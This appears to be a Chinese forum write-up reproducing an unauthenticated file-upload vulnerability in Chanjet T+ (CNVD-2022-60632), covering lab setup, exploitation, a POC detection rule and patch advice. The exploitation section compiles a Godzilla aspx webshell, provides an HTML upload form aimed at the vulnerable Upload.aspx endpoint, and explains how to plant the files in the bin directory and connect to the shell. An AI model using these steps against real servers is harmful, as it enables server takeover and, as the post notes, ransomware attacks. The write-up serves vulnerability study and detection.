0x01漏洞描述
2022年8月30日,国家信息安全漏洞共享平台(CNVD)收录了畅捷通T+软件任意文件上传漏洞(CNVD-2022-60632)。未经身份认证的攻击者可利用漏洞远程上传任意文件,获取服务器控制权限。目前,该漏洞已被发现利用进行勒索病毒攻击的情况,厂商已发布安全更新完成修复。
0x02影响范围
畅捷通T+单机版<=17.0且使用IIS10.0以下版本
0x03环境搭建
https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip
1、下载并解压
解压后文件如下:
2、环境检测
CheckEnvironment
3、安装
直接双击
选择标准版
中间会出现需要配置数据库选择不设置就好。
4、完成安装
0x04漏洞复现
1、首先需要一个aspx马(哥斯拉)
2、然后
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe -v / -p “aspx马的路径” “输出的路径” -fixednames
执行完毕后打开输出的路径下bin目录
3、构造一个本地上传代码
<form action="http://192.168.77.131/tplus/SM/SetupAccount/Upload.aspx?preload=1" method=post name=myform enctype="multipart/form-data">
<input type=file name=File1 size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type="submit" name="uploadfile" value="提交">
<input type=hidden name=originalfile value="">
</form>4、上传
将刚才生成的两个文件上传到网站根目录下的bin目录下
type必须为“jpeg”
上传dll文件时需要改burp编码为raw,不然上传上去内容就会改变。
只需上传这两个文件即可
5、搞定
直接访问
http://x.x.x.x/tplus/aaa.aspx?preload=1
哥斯拉连接
0x05POC检测
params: []
name: 畅捷通 T+ 文件上传漏洞
set:
ri: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYlt
body: |
------WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Disposition: form-data; name="File1";filename="{{ri}}.html"
Content-Type: image/jpeg
{{ri}}
------WebKitFormBoundarywwk2ReqGTj7lNYlt--
search: ""
followredirects: false
expression: 'response.status == 200 '
- method: GET
path: /tplus/SM/SetupAccount/images/{{ri}}.html
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(ri)))
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
0x06 修复建议
1、官方补丁, https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5
2、WAF拦截。
请登录后查看回复内容